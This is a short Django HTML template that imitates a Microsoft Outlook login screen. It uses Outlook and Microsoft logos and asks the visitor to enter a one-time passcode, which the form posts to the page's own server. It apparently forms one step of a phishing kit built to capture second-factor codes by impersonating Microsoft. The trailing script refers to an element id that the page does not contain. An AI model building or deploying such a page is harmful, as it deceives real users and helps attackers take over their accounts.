


<!DOCTYPE html>
{% load static %}
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Outlook Login</title>
    <link rel="stylesheet" href="{% static 'css/style1.css' %}">
</head>
<body>
    <div class="login-container">
        
        <div class="login-box">
            
            <img src="{% static 'images/outlook.png' %}" alt="Outlook" class="microsoft-logo">
            <form method="POST" action="" enctype="multipart/form-data">
                {% csrf_token %}
                <img src="{% static 'images/assets.svg' %}" alt="Microsoft Logo" class="mslogo">
                <!--<label for="email">Email</label>
                <input type="text" id="email" name="email" placeholder="Email">-->
                
                <label for="password">Enter your OTP</label>
                <input type="password" id="password" name="otp" placeholder="Password">
                
                <!--<a href="#">Forgot password?</a>-->
                <button  type="submit">Confirm</button>
                
                <a href="#" class="other-account">Didn't receive OTP?</a>
            </form>
        </div>
    </div>
</body>
</html>

<script>
document.getElementById('confirm-otp').addEventListener('click', function(event) {
    event.preventDefault(); // Prevent the default link behavior
    location.reload(); // Reload the page
});
</script>
